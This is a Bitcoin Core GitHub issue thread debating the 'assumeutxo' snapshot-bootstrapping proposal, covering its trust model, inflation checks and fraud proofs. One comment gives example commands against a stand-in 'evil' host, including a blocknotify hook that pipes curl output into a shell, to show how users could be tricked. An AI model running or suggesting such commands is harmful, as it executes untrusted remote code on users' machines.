assumeutxo #15605

jamesob opened this issue on March 15, 2019
  1. jamesob commented at 1:48 pm on March 15, 2019: member

    A more detailed proposal can be found here: https://github.com/jamesob/assumeutxo-docs/tree/2019-04-proposal/proposal


    I’d like to talk about the desirability of an assumeutxo feature, which would allow much faster node bootstrapping in the spirit of assumevalid. For those unfamiliar with assumeutxo, here’s an informal description from one of last year’s meetings:

    “Assume UTXO” is an idea similar to assumevalid. In assumevalid, you have a hash that is hard-coded into the code, and you assume all the blocks in the chain that ends in that hash, that those transactions have valid scripts. This is an optimization for startup to not have to do script checks if you’re willing to believe that the developers were able to properly review and validate up to that point. You could do something similar, where you cache the validity of the particular UTXO set, and it’s ACKed by developers before updating the code. Anyone can independently recompute that value. There’s some nuanced considerations for this […]. The downside if you fuck up is bigger. In assumevalid, you can trick someone into thinking the block is valid if it wasn’t, and assumeutxo you might be able to create coins or something; there are definitely different failure modes. So there’re different security implications here. You could use assumeutxo, but you could go back and double check later. But there’s nuance about how this should be done or how. You could have nodes that export this value, [and so one attack might be] you could lie to your friend I guess, but that’s less scary than other things.

    In other words, assumeutxo would be a way to initialize a node using a headers chain and a serialized version of the UTXO state which was generated from another node at some block height. A client making use of this UTXO “snapshot” would specify a hash and expect the content of the resulting UTXO set to yield this hash after deserialization.
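
    To make the check concrete, here is a minimal sketch of snapshot loading, assuming a hypothetical file format and using a double-SHA256 over the raw serialized bytes as a stand-in for whatever commitment scheme the real design would use:

    ```python
    import hashlib

    def load_snapshot(path: str, expected_hash: str) -> bytes:
        """Read a serialized UTXO snapshot and verify it against the hash
        the node was told to expect. The double-SHA256 over the raw bytes
        is a placeholder, not the actual serialization/hash scheme."""
        with open(path, "rb") as f:
            data = f.read()
        digest = hashlib.sha256(hashlib.sha256(data).digest()).hexdigest()
        if digest != expected_hash:
            raise ValueError(f"snapshot hash {digest} != expected {expected_hash}")
        return data  # caller deserializes this into a UTXO set
    ```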

This would allow users to bootstrap a usable pruned node & wallet far more quickly from a ~3GB file (at the time of writing) than by waiting for a full initial block download to complete, since we only have to sync blocks between the base of the snapshot and the current network tip. Needless to say, this comes at the expense of operating under a different trust model (albeit temporarily), though how different this really ends up being from assumevalid in effect is worth debate.

An implementation of assumeutxo could allow background validation of the loaded UTXO snapshot to happen concurrently with use of the assumed chain, so the trust model is only relaxed for a limited amount of time. Conceptually this is pretty straightforward: you’d have two chainstates maintained simultaneously, one of which is doing an IBD from genesis up to the base of the snapshot and the other (i.e. the assumed chain) just doing tip maintenance and servicing immediate requests for chain data. Once the validation chainstate reaches the height of the snapshot base, it computes a hash of the UTXO set it built and compares it to the snapshot’s hash. If it matches, we throw the validation chainstate away and continue to operate on the “assumed” (but now fully validated) chain; otherwise we pitch a fit in the logs and GUI, and either revert to the validation chainstate and continue traditional IBD or simply shut down.
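
    A minimal sketch of that hand-off logic (every name here is hypothetical; the `Chainstate` stub stands in for whatever the real implementation uses):

    ```python
    class Chainstate:
        """Stub standing in for a real chainstate object (hypothetical)."""
        def __init__(self, name: str, utxo_hash: str = ""):
            self.name = name
            self._utxo_hash = utxo_hash
        def utxo_set_hash(self) -> str:
            return self._utxo_hash   # hash of the coins DB at the current tip
        def discard(self) -> None:
            print(f"discarding chainstate '{self.name}'")

    def on_snapshot_base_reached(validation_cs: Chainstate,
                                 assumed_cs: Chainstate,
                                 snapshot_hash: str) -> Chainstate:
        """Run once the background (from-genesis) chainstate connects the
        block at the snapshot's base height; returns the chainstate to keep."""
        if validation_cs.utxo_set_hash() == snapshot_hash:
            validation_cs.discard()
            return assumed_cs        # the assumed chain is now fully validated
        print("ERROR: assumeutxo snapshot failed validation")  # logs/GUI alarm
        assumed_cs.discard()
        return validation_cs         # fall back to traditional IBD (or shut down)
    ```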

    Specifying assumeutxo

The assumeutxo value/height pairings could be committed in much the same way that we currently update assumevalid. Eventually (and this is not a new idea) we could consider using a rolling UTXO set hash or some similar technology to commit to the UTXO set hash in each block header, though this of course ends up being a consensus change. This would obviate the need for any hardcoded assumeutxo value, since bootstrapping nodes could obtain the headers chain, choose a UTXO set hash value at some height, and then obtain the corresponding UTXO snapshot from their peers on the basis of that hash.
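
    For concreteness, the hardcoded pairing might look like the sketch below; the height and hash are placeholders, and the real table would presumably live in the chain parameters next to the assumevalid default:

    ```python
    # Hypothetical hardcoded snapshot parameters, updated at release time
    # alongside assumevalid. The entry below is a placeholder, not real data.
    ASSUMEUTXO_SNAPSHOTS = {
        # height: reviewed hash of the serialized UTXO set at that height
        560000: "0000000000000000000000000000000000000000000000000000000000000000",
    }

    def expected_snapshot_hash(height: int) -> str | None:
        """Return the committed hash for a snapshot base height, or None
        if no snapshot is supported at that height."""
        return ASSUMEUTXO_SNAPSHOTS.get(height)
    ```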

    Obtaining snapshots

    Snapshots could be obtained from a variety of sources, whether over the peer network or centralized content distribution networks (CDNs). It doesn’t really matter since security is contingent on a content hash, though if assumeutxo ends up being something we actually want to support then I’d imagine we would build a means of distribution through the peer network.

    Steps

    I’ve already drafted up an implementation of this that excludes any P2P mechanism for distributing snapshots but makes the changes necessary for loading snapshots and doing concurrent background validation. It exposes two new RPC commands, dumptxoutset and loadtxoutset, to provide a test harness for creating and loading snapshots. Whether or not we’d actually want to commit that RPC interface is something I’d like input on.

    Another option is to eschew a loadtxoutset RPC and use a -utxosnapshot=<path> startup parameter.
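
    Under the RPC option, a test-harness round trip might look like this sketch; it assumes, as proposed, that both commands take a filesystem path, and the datadirs are made up:

    ```python
    import subprocess

    def cli(datadir: str, *args: str) -> str:
        """Thin wrapper around bitcoin-cli for a node at `datadir`."""
        out = subprocess.run(["bitcoin-cli", f"-datadir={datadir}", *args],
                             check=True, capture_output=True, text=True)
        return out.stdout.strip()

    # On a fully synced node: serialize its UTXO set to disk.
    cli("/data/synced-node", "dumptxoutset", "/tmp/utxo.dat")

    # On a fresh node that has synced headers: load the snapshot and begin
    # tip maintenance while background validation runs from genesis.
    cli("/data/fresh-node", "loadtxoutset", "/tmp/utxo.dat")
    ```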

Afterwards, supposing we get that far, we’ll probably want to think about implementing P2P distribution of snapshots, and then maybe start thinking about a rolling UTXO set hash for potential inclusion in block headers.

    Questions

I’m curious about general opinions on this idea and the concrete implementation steps. If this ends up being desirable for the project, it’ll require a lot of refactoring and will probably result in a lengthy succession of incremental PRs (a la the process separation effort), though I am of course happy to propose large, cohesive diffs too. :)

    Specific questions I have are:

    1. Does the assumeutxo trust model differ materially from assumevalid? If so, how? Is it too aggressive a departure from our existing trust model?
    2. If we agree this is a feature worth supporting, does the sequence of “RPC commands -> hardcoded assumeutxo value, optional use, P2P distribution -> UTXO rolling set hash block header commitment” make sense?
  2. fanquake added the label Validation on Mar 15, 2019
  3. maflcko commented at 2:13 pm on March 15, 2019: member
I think this is materially different from -assumevalid, because there are additional safety features built into assumevalid that are not possible (as of now) for assumeutxo: assumevalid must be a block hash in a headers chain that has overall valid PoW and is covered by two weeks’ worth of PoW on top of the assumevalid block. Also, all UTXO operations (adding and removing coins) before assumevalid must be fully valid except for the script check, which is optionally skipped. So you couldn’t create coins out of thin air with assumevalid. assumeutxo does not have those “belt and suspenders”. So if an assumeutxo hash is put into the code base (after review), it must not be possible for a user to simply pass in (either by mistake or consciously) their own hash via command line argument or otherwise.
  4. maflcko added the label Brainstorming on Mar 15, 2019
  5. luke-jr commented at 6:04 pm on March 15, 2019: member
    Concept NACK, this significantly changes Bitcoin’s security model.
  6. sipa commented at 7:11 pm on March 15, 2019: member

additional safety features built into assumevalid that are not possible (as of now) for assumeutxo: assumevalid must be a block hash in a headers chain that has overall valid PoW and is covered by two weeks’ worth of PoW on top of the assumevalid block.

    I don’t see why this isn’t possible for assumeutxo? You would include the tip block hash in the data hashed for assumeutxo, and the UTXO set you receive would need to include that hash (stating which block it is for). If the resulting hash isn’t sufficiently deeply buried in the headers chain, you reject it.
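
    In code, the burial check might look like this sketch, where `headers` is the node’s best headers chain as a list of block hashes and “two weeks of PoW” is approximated as 2016 blocks at the 10-minute target interval:

    ```python
    def snapshot_acceptable(headers: list[str], snapshot_base_hash: str,
                            min_burial: int = 2016) -> bool:
        """Accept a snapshot only if the block hash it commits to appears
        in our best headers chain and is buried under enough subsequent
        headers (2016 blocks is roughly two weeks at 10-minute spacing).
        A real implementation would compare accumulated work rather than
        simply counting headers."""
        try:
            base_height = headers.index(snapshot_base_hash)
        except ValueError:
            return False  # the snapshot's block is not in our chain at all
        return (len(headers) - 1 - base_height) >= min_burial
    ```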

    So you couldn’t create coins out of thin air with assumevalid.

    With assumeutxo you can still have an inflation check (because the total accumulated subsidy is known for each height), so I don’t think there is a difference. The only failure an invalid assumeutxo could lead to is incorrectly assigning coins, but the same is possible right now with an invalid assumevalid (which doesn’t prevent theft).
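
    The inflation check works because the maximum possible issuance at any height follows directly from the subsidy schedule (50 BTC, halving every 210,000 blocks). A sketch:

    ```python
    COIN = 100_000_000          # satoshis per bitcoin
    HALVING_INTERVAL = 210_000  # blocks between subsidy halvings

    def block_subsidy(height: int) -> int:
        """Consensus block subsidy at `height`, in satoshis."""
        halvings = height // HALVING_INTERVAL
        if halvings >= 64:      # shifting by >= 64 would be undefined in C++
            return 0
        return (50 * COIN) >> halvings

    def max_supply_at(height: int) -> int:
        """Upper bound on coins in existence after block `height`; actual
        supply can be lower, since miners may claim less than the subsidy."""
        return sum(block_subsidy(h) for h in range(height + 1))

    def passes_inflation_check(snapshot_total: int, height: int) -> bool:
        """Reject any snapshot whose summed output amounts exceed the bound."""
        return snapshot_total <= max_supply_at(height)
    ```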

  7. jamesob commented at 10:39 pm on March 16, 2019: member

    The only failure an invalid assumeutxo could lead to is incorrectly assigning coins, but the same is possible right now with an invalid assumevalid (which doesn’t prevent theft).

    I think there’s an argument to be made that convincing someone of an incorrect coin assignment is easier in assumeutxo because under assumevalid you’d have to reconstruct a valid series of blocks (with the accompanying PoW) after the bad coin assignment. In assumeutxo, if you can convince someone to accept a malicious hash, all the attacker has to do is serialize their modified set with no concern for alternate PoW construction. You wouldn’t find out about this until the background validation process catches up to the block where the incorrect assignment happened.

  8. maflcko commented at 9:32 pm on March 17, 2019: member

    I don’t see why this isn’t possible for assumeutxo?

The logic itself is possible to implement in the same fashion, but not the trust model (allowing users to set the hash to an arbitrary one on the command line). With “out of thin air” I meant “without effort” (other than telling the user on my website to set -assumeutxo=myhash and then download myutxoset.dat). That is solved if it is absolutely not possible for the user to set the hash.

  9. harding commented at 1:11 pm on April 8, 2019: contributor

With “out of thin air” I meant “without effort” (other than telling the user on my website to set -assumeutxo=myhash and then download myutxoset.dat).

    @MarcoFalke But can’t the malicious party now just tell the user to wget example.com/evilutxoset.tar.gz && tar xzf evilutxoset.tar.gz? Or, if they wanted to make it look like a bitcoind configuration option, bitcoind -blocknotify "curl example.com/evil | sh"?

    Maybe it’d be satisfactory to just give the option a name that better hints at the danger of using it with an untrusted source, e.g. -trustedutxo or -balance-snapshot-you-trust.

  10. maflcko commented at 4:27 pm on April 10, 2019: member

Indeed they can. Though they might also encourage you to buy backdoored hardware. Generally, Bitcoin Core assumes that the underlying architecture (hardware, filesystem, operating system, network sockets, …) is not tampered with. There is nothing we can do to prevent that.

However, if it comes to Bitcoin Core internals, we should not allow backdoors and footguns. For example, allowing users to modify consensus settings on the command line (like block size, the utxo set, …).

    For regtest it could make sense to allow setting this to simplify testing.

  11. jamesob commented at 3:28 pm on April 23, 2019: member

    I’ve created a draft proposal for assumeutxo here: https://github.com/jamesob/assumeutxo-docs/tree/2019-04-proposal/proposal

    If anyone would like to leave inline comments, the associated PR is here: https://github.com/jamesob/assumeutxo-docs/pull/1

  12. maflcko referenced this in commit b2a6b02161 on May 7, 2019
  13. sidhujag referenced this in commit dced7ccc66 on May 7, 2019
  14. bitcoin deleted a comment on May 9, 2019
  15. fresheneesz commented at 10:00 pm on May 26, 2019: none

    I think James’s proposal addresses many of the concerns that have been brought up.

I think it’s worth noting that the solution to the “one practical security difference” in phase 1 or 2 is not resilient in an adversarial environment. This could be solved by having a client ask all of its connections to verify that the UTXO snapshot is correct; if any one of its connections says the UTXO set isn’t correct, the client would build the UTXO set from scratch. However, it would be easy for an attacker to force many or even most newly connecting clients to build it from scratch, which defeats the purpose of the upgrade (i.e. scalability). Assumevalid doesn’t have this problem, since verifying claims about chain validity is much easier than verifying claims about UTXO set validity. Phase 3 solves the problem in a much nicer way.

    So you couldn’t create coins out of thin air with assumevalid. assumeutxo does not have those “belt and suspenders”.

Even if we allow the user to enter a golden UTXO hash, I believe:

if it comes to Bitcoin Core internals, we should not allow backdoors and footguns. For example, allowing users to modify consensus settings on the command line

I agree. And so does Pieter Wuille: “allowing [utxo snapshots] to be configured is even more scary (e.g. some website saying “speed up your sync, start with this command line flag!”).” If all 3 phases of jamesob’s proposal are implemented, though, allowing the user to input a UTXO snapshot would be safe, since the client could efficiently verify the truth of the claim and ignore it if it’s not true.

  16. laanwj referenced this in commit 5d37c1bde0 on Jun 5, 2019
  17. sidhujag referenced this in commit 252b7cf94b on Jun 6, 2019
  18. mandelmonkey commented at 10:01 am on June 30, 2019: none
Does assumeutxo offer any benefits that just bootstrapping with BIP 157/158 Neutrino whilst IBD is being performed doesn’t? I suppose this is a “cleaner” approach, as you are not running an extra client/service, but it sounds like anybody wanting to bootstrap, say, a mobile full node could do so today with a lightclient/fullnode hybrid.
  19. maflcko commented at 1:49 pm on June 30, 2019: member

    Does assumeutxo offer any benefits that just bootstrapping with BIP 157/158 Neutrino whilst IBD is being performed doesn’t?

blockfilters provide no means of bootstrapping your utxo set so that you could start using all full node functionality (block/tx validation, block/tx propagation, …) at the tip.

  20. mandelmonkey commented at 2:05 pm on June 30, 2019: none

    Does assumeutxo offer any benefits that just bootstrapping with BIP 157/158 Neutrino whilst IBD is being performed doesn’t?

blockfilters provide no means of bootstrapping your utxo set so that you could start using all full node functionality (block/tx validation, block/tx propagation, …) at the tip.

Thanks. I meant that you’d have a light client running alongside your full node, so you can use your wallet with the light client whilst your full node is performing IBD; once finished, it switches over. assumeutxo is a cleaner option, as explained here, but I am thinking in terms of mobile wallets, where having to download X megabytes after being offline for a few days/weeks is slower than using blockfilters to sync.

  21. laanwj referenced this in commit 8f604361eb on Jul 16, 2019
  22. fanquake referenced this in commit 848f245d04 on Jul 23, 2019
  23. sidhujag referenced this in commit 17e7b271dd on Jul 29, 2019
  24. maflcko referenced this in commit 85883a9f8e on Aug 15, 2019
  25. maflcko referenced this in commit a7be1cc92b on Aug 27, 2019
  26. sidhujag referenced this in commit 717747348e on Aug 27, 2019
  27. maflcko referenced this in commit 7d4bc60f1f on Sep 19, 2019
  28. sidhujag referenced this in commit d8a09acbc9 on Sep 23, 2019
  29. laanwj referenced this in commit a37f4c220a on Oct 30, 2019
  30. laanwj referenced this in commit b05b28183c on Nov 5, 2019
  31. sidhujag referenced this in commit 9df460f09f on Nov 7, 2019
  32. laanwj referenced this in commit 2ed74a43a0 on Jan 13, 2020
  33. sidhujag referenced this in commit ab2fb60cfa on Jan 14, 2020
  34. maflcko referenced this in commit 10358a381a on Apr 10, 2020
  35. sidhujag referenced this in commit d35bad573a on Apr 13, 2020
  36. maflcko referenced this in commit 2f71a1ea35 on Jul 29, 2020
  37. sidhujag referenced this in commit 191c48d32d on Jul 31, 2020
  38. sidhujag referenced this in commit f0b0681fa2 on Nov 10, 2020
  39. sidhujag referenced this in commit 8e75779f0e on Nov 10, 2020
  40. UdjinM6 referenced this in commit 9ab9422d7b on Nov 17, 2020
  41. UdjinM6 referenced this in commit 36d275396f on Dec 1, 2020
  42. PastaPastaPasta referenced this in commit b559a8f904 on Dec 15, 2020
  43. andronoob commented at 2:04 pm on December 28, 2020: none

    In assumeutxo, if you can convince someone to accept a malicious hash, all the attacker has to do is serialize their modified set with no concern for alternate PoW construction

    If we agree this is a feature worth supporting, does the sequence of “RPC commands -> hardcoded assumeutxo value, optional use, P2P distribution -> UTXO rolling set hash block header commitment” make sense?

Committing the hash of the UTXO set to the blockchain could bring the same PoW check to UTXO snapshots. However, it’s probably still not equivalent to the current assumevalid situation. The hardcoded assumevalid block hash doesn’t imply data availability; the burdensome blockchain download is what actually validates data availability, without trusting the developers who specified such hash. AFAIK data availability is the main reason why fraud proofs can’t work.

  44. andronoob commented at 2:09 pm on December 28, 2020: none
However, in reality I still wish such a rolling UTXO set commitment (at the consensus level) would happen, because otherwise people will keep trying to achieve the same UTXO-snapshot goal in even less secure ways (like downloading a UTXO set from random websites to overwrite the entire chainstate subdirectory).
  45. fresheneesz commented at 7:02 pm on December 28, 2020: none

    The hardcoded assumevalid block hash doesn’t imply data availability

Data availability for used transaction outputs is unnecessary. Availability of UTXOs at the point of the assumevalid hash is necessary, and a node will not consider a blockchain valid without it. What data availability do you think needs to be validated but wouldn’t be?

    without trusting the developers who specified such hash

I want to point out that you need not trust developers any more than normal with this: many, many people will still be reviewing code changes, and you still need to trust that distributors of the software aren’t malicious (in a way that version validation, e.g. validating a GPG signature, can’t cover).

  46. andronoob commented at 6:01 am on December 29, 2020: none

Data availability for used transaction outputs is unnecessary. Availability of UTXOs at the point of the assumevalid hash is necessary, and a node will not consider a blockchain valid without it. What data availability do you think needs to be validated but wouldn’t be?

    I didn’t believe it either, until I learned the story of fraud proofs.

I want to point out that you need not trust developers any more than normal with this: many, many people will still be reviewing code changes, and you still need to trust that distributors of the software aren’t malicious (in a way that version validation, e.g. validating a GPG signature, can’t cover).

I was talking about committing the UTXO hash into the blockchain, by the miners, rather than the current proposal (hard-coded), which trusts the developers just like assumevalid.

  47. fresheneesz commented at 7:04 am on December 29, 2020: none

    I didn’t believe it either, until I learned the story of fraud proofs.

    Enlighten us…

committing the UTXO hash into the blockchain, by the miners, rather than the current proposal (hard-coded), which trusts the developers just like assumevalid.

    I see. I’m in support of that. However, I don’t think it materially reduces trust in the UTXO hashes. If the software you’re using is malicious, no amount of hashpower behind a UTXO hash will save you (because your software can simply decide to ignore it).

  48. andronoob commented at 2:19 pm on December 29, 2020: none

    Enlighten us…

I may well have misunderstood this topic myself. I’ll just try my best.

The idea of fraud proofs originated in Satoshi’s whitepaper, which described that although an SPV client cannot validate transactions on its own, it may still receive alarms from fully validating nodes pointing it to the position where something invalid appears; the SPV client can then download and verify the indicated blocks on its own, to avoid blindly following an invalid chain with more PoW.

For example, if a transaction spends an already-spent coin, a fraud proof consisting of Merkle proofs of both the original transaction and the double-spending invalid transaction can be sent to SPV clients. SPV clients can validate such a proof without downloading the blockchain, and so will know the chain is invalid and shouldn’t be followed.
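
    The Merkle-proof half of such a fraud proof is mechanical. Here is a sketch of the inclusion check using Bitcoin’s double-SHA256 tree; note that it only proves a 32-byte leaf is committed to by the root, not that a well-formed transaction behind that leaf is available, which is exactly the flaw described further below:

    ```python
    import hashlib

    def sha256d(b: bytes) -> bytes:
        return hashlib.sha256(hashlib.sha256(b).digest()).digest()

    def verify_merkle_proof(leaf: bytes, branch: list[bytes],
                            index: int, merkle_root: bytes) -> bool:
        """Check that `leaf` (a 32-byte txid) is committed to by
        `merkle_root`, given the sibling hashes from leaf to root and the
        leaf's position in the block. This says nothing about whether any
        valid transaction hashing to `leaf` actually exists or is
        downloadable."""
        h = leaf
        for sibling in branch:
            if index & 1:                  # we are the right child
                h = sha256d(sibling + h)
            else:                          # we are the left child
                h = sha256d(h + sibling)
            index >>= 1
        return h == merkle_root
    ```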

We can see that fraud proofs were supposed to work just like “supervision by public opinion” in real life, and even better: they were supposed to be “fact-based” rather than “opinion-based”, because fraud proofs were supposed to be succinct and verifiable without the gigantic blockchain data.

With the help of fraud proofs, SPV was supposed to be almost as secure as a fully validating node.

However, this strategy has a fatal flaw: to generate a fraud proof, the invalid part of the block must be known in the first place. If some part of a block can’t be downloaded, you can’t convince other people that it’s impossible to fully download that block; they must try downloading it on their own to see whether it’s truly undownloadable.

For example, a normal valid block has its own Merkle tree, where each leaf node is the hash of a valid transaction. If you put something into the Merkle tree which isn’t a hash at all (so that it has no known preimage), then nobody can provide the “full block data”. Fully validating nodes won’t accept such malformed blocks, but SPV clients will still blindly accept Merkle proofs built on them. Fully validating nodes can’t prove the block is malformed either; at best, SPV clients still need to try downloading the specified block on their own, which in turn becomes a DoS vector: an attacker can send false alarms to trick SPV clients into downloading existing (valid) blocks, wasting their bandwidth, so the goal of a lightweight SPV client is defeated.

Back to the topic of a fully validating node that just skips downloading the gigantic historical blockchain data: as long as you don’t validate all blocks before the UTXO snapshot, you won’t know whether some similarly invalid/malformed thing sneaked into those “unknown” blocks. You can’t hope someone will alert you either, because you won’t know whether it’s a false alarm. With the default assumevalid situation, although you don’t fully verify the contents of historical blocks either, it is at least theoretically possible to generate a fraud proof containing objectively irrefutable evidence that some block violates the consensus rules (theoretical for now, because some cases, like spending never-existed UTXOs, need additional commitment structures that are currently missing).

  49. andronoob commented at 2:39 pm on December 29, 2020: none

    However, I don’t think it materially reduces trust in the UTXO hashes. If the software you’re using is malicious, no amount of hashpower behind a UTXO hash will save you (because your software can simply decide to ignore it).

AFAIK, in Bitcoin, miners are not supposed to be trusted at all, let alone compared to developers. I never said that miners can reduce trust in developers (who hard-code UTXO hashes into the software; of course, they can do much more evil things than hard-coding malicious UTXO hashes).

  50. andronoob commented at 2:52 pm on December 29, 2020: none

A lot of people think that after adding a new consensus rule requiring miners to commit to the UTXO set on-chain (so that brand-new full nodes can skip downloading the gigantic historical blockchain data), Bitcoin will work the same way it has worked up till now; after all, every bitcoin transaction is confirmed by miners. Some people just disagree with this point; maybe @luke-jr is one of them, hence his “Concept NACK, this significantly changes Bitcoin’s security model” above.

In my opinion, as long as a typical PC with a common Internet connection is still able (not “required”, “forced”, etc.) to fully validate the entire blockchain, skipping the download of the old blocks would be fine; after all, those old blocks have been repeatedly validated tens of thousands of times.

  51. fresheneesz commented at 9:24 pm on December 29, 2020: none

at best, SPV clients still need to try downloading the specified block on their own

    Valid uses of this would be extraordinarily rare. Even 1 block per year would be far more frequent than is at all likely. The bandwidth needed is small, even for lightweight SPV nodes.

a DoS vector: an attacker can send false alarms to trick SPV clients into downloading existing (valid) blocks, wasting their bandwidth

That’s true; however, there is already a way of dealing with bad behavior from connected nodes: disconnect from them. As long as the network of SPV servers is decentralized and honest nodes compose a significant fraction of those SPV servers, there’s a pretty low limit on possible shenanigans.

For example, let’s say your pool of SPV servers consists of 70% honest nodes and 30% malicious actors. If your SPV node connects to 10 SPV servers, an average of 3 of them will be malicious and can send 3 fake fraud claims that result in 3 (extra) block downloads. After disconnecting from those 3 jokers, an average of 1 of the 3 new SPV servers it connects to will be malicious, resulting in a 4th extra block download. The last replacement would not usually be malicious. That’s 4 extra blocks, which hardly destroys the goal of having a lightweight node.
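
    That back-of-the-envelope count can be checked with a quick simulation, a sketch under the stated assumptions (each malicious server costs exactly one wasted block download, is disconnected, and is replaced by a fresh draw from the same pool):

    ```python
    import random

    def wasted_downloads(honest_frac: float = 0.7, peers: int = 10,
                         trials: int = 100_000) -> float:
        """Average number of extra block downloads before an SPV node has
        replaced every malicious peer."""
        total = 0
        for _ in range(trials):
            need = peers
            while need:
                # how many of the (re)connected peers turn out malicious
                bad = sum(random.random() >= honest_frac for _ in range(need))
                total += bad    # one wasted download per malicious peer
                need = bad      # replace only the disconnected ones
        return total / trials

    print(wasted_downloads())   # ~4.3 extra blocks with 30% malicious peers
    ```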

So even if you have a massive fraction of malicious nodes, you can’t really troll SPV nodes that hard, as long as they’re following best practices and disconnecting from nodes that give them bad data.

as long as a typical PC with a common Internet connection is still able (not “required”, “forced”, etc.) to fully validate the entire blockchain, skipping the download of the old blocks would be fine

I think it’s very important that the Bitcoin community come to a consensus around the boundaries of what we consider “safe” as far as resource usage. What are the minimum resources of that “typical PC with a common internet connection”? If we need to support practical verifiability of the entire chain on below-average machines with below-average resources, we need to limit the blockchain’s growth much more than if we decided we only need to support practical verifiability of the entire chain by “average or better” machines, etc. Once we decide on the power of the machines we think we need to support, we can then calculate how big blocks can safely be.

  52. andronoob commented at 2:38 am on December 30, 2020: none

    Valid uses of this would be extraordinarily rare. Even 1 block per year would be far more frequent than is at all likely. The bandwidth needed is small, even for lightweight SPV nodes.

Just one rule-breaking transaction could already be catastrophic, like minting 1 trillion coins out of thin air (which could be done in many ways, e.g. by spending nonexistent UTXOs).

It’s not about bargaining over bandwidth either. The point was that you can’t know whether the alarm you received is a malicious false alarm. Even if you see a block fail to download, you can’t convince others: “oh, must be a temporary network connectivity issue, maybe you should just try again?”

    As long as the network of SPV servers is decentralized and honest nodes compose a significant fraction of those SPV servers

Just as Satoshi’s whitepaper outlined:

    If the majority were based on one-IP-address-one-vote, it could be subverted by anyone able to allocate many IPs.

Miners are not naturally honest or selfless; on the contrary, they are expected to behave greedily, selfishly and rationally. Miners are just incentivised to behave honestly under the constraints of the consensus rules, or in other words, game theory.

Miners respect the consensus rules because they know other people will verify the blocks they mine according to those rules; if they dare to let anything violating the rules sneak in, then no one will accept their hard-mined block (which cost expensive electricity in the real world).

(To be honest, AFAIK, there are disagreements around this point: some people believe that only miners should verify blocks, while others believe that not only miners but also the economic majority should always verify them.)

I think it’s very important that the Bitcoin community come to a consensus around the boundaries of what we consider “safe” as far as resource usage. What are the minimum resources of that “typical PC with a common internet connection”? If we need to support practical verifiability of the entire chain on below-average machines with below-average resources, we need to limit the blockchain’s growth much more than if we decided we only need to support practical verifiability of the entire chain by “average or better” machines, etc.

    Agreed.

  53. andronoob commented at 2:50 am on December 30, 2020: none
I see your point that successfully downloading a block proves that the alarm was a false one. However (leaving aside Sybil attacks), it still can’t save the idea of fraud proofs, because even if you have failed to download a block, you still can’t be sure whether it’s just some network connectivity issue, like the case of a stalled bittorrent which lacks seeders. In the end the alarm is still going to be ignored.
  54. fresheneesz commented at 8:21 am on December 30, 2020: none

    Just one rule-breaking transaction could already be catastrophic

I think I know what you mean, but a rule-breaking transaction that inflates the supply of bitcoin is not relevant to fraud proofs. The rare event I was talking about, in a bitcoin with fraud proofs, would be a majority of mining power trying to fork the blockchain in ways that would fool SPV nodes. If fraud proofs were in place, this would not only be incredibly difficult to pull off (as it would be without fraud proofs), but would also be unsuccessful. Without fraud proofs, such a scenario could succeed, and it could be catastrophic.

    The point was that you can’t know whether the alarm you received is a malicious false alarm.

    That’s simply not true. You download the accused block, you validate it, and then you know.

Even if you see a block fail to download, you can’t convince others: “oh, must be a temporary network connectivity issue, maybe you should just try again?”

If a node can’t download a block, then it’s invalid, full stop. You don’t accept that a block is valid if you can’t download it. Why would you? If someone can’t download it, they should be very convinced that it’s not a valid block until shown otherwise.

    In the end the alarm is still going to be ignored.

If you program the SPV node software not to ignore that, it won’t be ignored. It would be a pretty stupid rule to ignore the fact that the data is not available.

  55. andronoob commented at 9:58 am on December 30, 2020: none

You can’t know whether a block is downloadable (let alone valid) before actually trying to download it yourself. There are currently hundreds of thousands of historical blocks; if some stranger tells you block XXXXXX can’t be downloaded, what can you do? You must try downloading it on your own. Even if you can eventually rule out all false alarms, you have already paid an expensive price.

Not accepting a block is also not the same as rejecting a block; the latter requires known, clear evidence. For example, a full node won’t accept even a valid block until it’s fully downloaded and verified.

If you decide to mark a chain you haven’t fully downloaded as invalid simply because you failed to download some of its blocks, then a temporary network connectivity issue (whether unintentional or malicious) can effectively shut down your full node, which is even worse than being tricked into downloading (almost) the entire blockchain.

  56. fresheneesz commented at 7:02 pm on December 30, 2020: none
    @andronoob I disagree that your points support your proposition that fraud proofs aren’t useful/workable. But I don’t think this conversation is productive for this issue. If you want to keep discussing it, PM me on reddit.
  57. andronoob commented at 2:25 am on December 31, 2020: none

@fresheneesz I think it’s more a theoretical problem than a practical one as well.

    There’s already a stackexchange question: https://bitcoin.stackexchange.com/questions/83422/is-the-idea-of-fraud-proofs-possible-in-reality

  58. laanwj referenced this in commit 92fee79dab on Feb 16, 2021
  59. ryanofsky commented at 10:34 am on July 21, 2021: contributor

    (from IRC)

    <jamesob> Do we ever expect to support an index that actually requires sequential indexing? Jimpo’s BaseIndex advertises that it will index sequentially, but at the moment none of the particular indexers require this. Furthermore, we will have BlockConnected events triggering indexing out of order once we start using background chainstates for assumeutxo

I don’t think it affects what you’re doing here, but I think of wallets as mini-indexes requiring sequential indexing. Wallets need to scan blocks in sequential order so the IsFromMe check (in AddToWalletIfInvolvingMe) will work. Eventually, after #15719, I think wallets and indexes should use the same interfaces::Chain sync / rescan / block connected / rewind interface and hooks, and work more efficiently together.

  60. PhotoshiNakamoto referenced this in commit cda98e1821 on Dec 11, 2021
  61. gades referenced this in commit 6a887db9d9 on Mar 11, 2022
  62. fanquake referenced this in commit 82903a7a8d on Jan 30, 2023
  63. sidhujag referenced this in commit 8ff3d69a6a on Jan 30, 2023
  64. pinheadmz closed this on Apr 27, 2023

  65. rebroad commented at 11:07 am on May 12, 2023: contributor

Regarding bootstrapping a pruned node from a full node, the way I’d do it is: use bitcoin-cli to stop the running node from accepting any more blocks or transactions; copy (--reflink=always) the block index and chainstate to a new bitcoind instance; use bitcoin-cli to have the running node resume accepting blocks and transactions; modify the new instance to use new ports and enable pruning; run it, wait for it to prune the block index, and then exit. Voila: I have a ready-to-copy bitcoind instance that I can install elsewhere.

I’m not really sure it needs to be much more complicated than this. Ideally, a way to do it without suspending activity on the main instance would be nice, but it’s hardly worth it given the relatively little downtime the above method causes.
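
    Scripted, the procedure might look roughly like the sketch below. The paths and ports are made up, `setnetworkactive` is one guess at the “pause” step described above, and `cp --reflink=always` requires a copy-on-write filesystem such as btrfs or XFS:

    ```python
    import subprocess

    def run(*cmd: str) -> None:
        subprocess.run(cmd, check=True)

    # 1. Pause the running node's network activity so its state stops changing.
    run("bitcoin-cli", "setnetworkactive", "false")

    # 2. Cheap copy-on-write clone of the block index and chainstate
    #    (the target directory must already exist).
    run("cp", "--reflink=always", "-r", "/home/user/.bitcoin/blocks",
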